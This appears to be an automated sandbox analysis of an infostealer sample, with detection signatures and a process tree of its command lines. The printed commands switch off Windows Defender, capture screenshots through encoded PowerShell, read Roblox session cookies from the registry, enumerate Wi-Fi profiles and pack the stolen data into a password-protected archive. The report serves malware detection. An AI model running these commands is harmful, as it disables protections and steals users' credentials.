Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-12-2024 03:12

General

  • Target

    3ca3e36031f8b7128739c85e0f1bab4a178a4546af60142851d1ba42f3bd0672.exe

  • Size

    7.5MB

  • MD5

    e302186ae6217d48fc6eef1fe780ec26

  • SHA1

    17fcd5699fc208e8b520eb9ad1c0b4a0305a5f0a

  • SHA256

    3ca3e36031f8b7128739c85e0f1bab4a178a4546af60142851d1ba42f3bd0672

  • SHA512

    29cd7dc1704ba96d71e4cde67fd1d61426dff8c67003121ff4b2c60fd39066f9fe208717f3f1fd78ad991881681b9c9b4c9e790454963caaac3901d2b32313f2

  • SSDEEP

    196608:cdLjv+bhqNVoBLD7fEXEoYbiIv9pvvk9fIiZ1jt:SL+9qz8LD7fEUbiIqQgpt

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 16 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • UPX packed file 59 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3ca3e36031f8b7128739c85e0f1bab4a178a4546af60142851d1ba42f3bd0672.exe
    "C:\Users\Admin\AppData\Local\Temp\3ca3e36031f8b7128739c85e0f1bab4a178a4546af60142851d1ba42f3bd0672.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1348
    • C:\Users\Admin\AppData\Local\Temp\3ca3e36031f8b7128739c85e0f1bab4a178a4546af60142851d1ba42f3bd0672.exe
      "C:\Users\Admin\AppData\Local\Temp\3ca3e36031f8b7128739c85e0f1bab4a178a4546af60142851d1ba42f3bd0672.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4012
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\3ca3e36031f8b7128739c85e0f1bab4a178a4546af60142851d1ba42f3bd0672.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4416
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\3ca3e36031f8b7128739c85e0f1bab4a178a4546af60142851d1ba42f3bd0672.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1036
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2156
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4316
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3728
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"
          4⤵
            PID:1592
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2764
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3244
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:764
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1936
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3036
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            4⤵
              PID:4988
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1116
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              4⤵
                PID:2420
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1664
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:1360
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2776
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                PID:1604
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ ‏ .scr'"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3612
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ ‏ .scr'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:1556
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3148
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:2212
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1292
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:4208
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              3⤵
                PID:1716
                • C:\Windows\System32\Wbem\WMIC.exe
                  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                  4⤵
                    PID:1936
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                  3⤵
                  • Clipboard Data
                  PID:952
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell Get-Clipboard
                    4⤵
                    • Clipboard Data
                    • Suspicious behavior: EnumeratesProcesses
                    PID:924
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                  3⤵
                    PID:3216
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FO LIST
                      4⤵
                      • Enumerates processes with tasklist
                      PID:4316
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:2128
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:2588
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                        3⤵
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:4880
                        • C:\Windows\system32\netsh.exe
                          netsh wlan show profile
                          4⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Network Configuration Discovery: Wi-Fi Discovery
                          PID:4032
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "systeminfo"
                        3⤵
                          PID:4464
                          • C:\Windows\system32\systeminfo.exe
                            systeminfo
                            4⤵
                            • Gathers system information
                            PID:3308
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                          3⤵
                            PID:2020
                            • C:\Windows\system32\reg.exe
                              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                              4⤵
                                PID:3544
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                              3⤵
                                PID:4468
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:1152
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ucizalgw\ucizalgw.cmdline"
                                    5⤵
                                      PID:440
                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB0E1.tmp" "c:\Users\Admin\AppData\Local\Temp\ucizalgw\CSCAD21BAB36FDB4DC18D5946FD8371B78.TMP"
                                        6⤵
                                          PID:1940
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                    3⤵
                                      PID:1480
                                      • C:\Windows\system32\attrib.exe
                                        attrib -r C:\Windows\System32\drivers\etc\hosts
                                        4⤵
                                        • Drops file in Drivers directory
                                        • Views/modifies file attributes
                                        PID:968
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                      3⤵
                                        PID:1636
                                        • C:\Windows\system32\tree.com
                                          tree /A /F
                                          4⤵
                                            PID:2972
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                          3⤵
                                            PID:4568
                                            • C:\Windows\system32\attrib.exe
                                              attrib +r C:\Windows\System32\drivers\etc\hosts
                                              4⤵
                                              • Drops file in Drivers directory
                                              • Views/modifies file attributes
                                              PID:2648
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            3⤵
                                              PID:4780
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                4⤵
                                                  PID:4956
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                3⤵
                                                  PID:2784
                                                  • C:\Windows\system32\tasklist.exe
                                                    tasklist /FO LIST
                                                    4⤵
                                                    • Enumerates processes with tasklist
                                                    PID:3632
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                  3⤵
                                                    PID:2964
                                                    • C:\Windows\system32\tree.com
                                                      tree /A /F
                                                      4⤵
                                                        PID:4796
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      3⤵
                                                        PID:932
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          4⤵
                                                            PID:4252
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          3⤵
                                                            PID:4908
                                                            • C:\Windows\system32\tree.com
                                                              tree /A /F
                                                              4⤵
                                                                PID:4444
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                              3⤵
                                                                PID:4516
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                  4⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:468
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                3⤵
                                                                  PID:4428
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                    4⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:212
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "getmac"
                                                                  3⤵
                                                                    PID:3740
                                                                    • C:\Windows\system32\getmac.exe
                                                                      getmac
                                                                      4⤵
                                                                        PID:4800
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI13482\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\Yu8d2.zip" *"
                                                                      3⤵
                                                                        PID:932
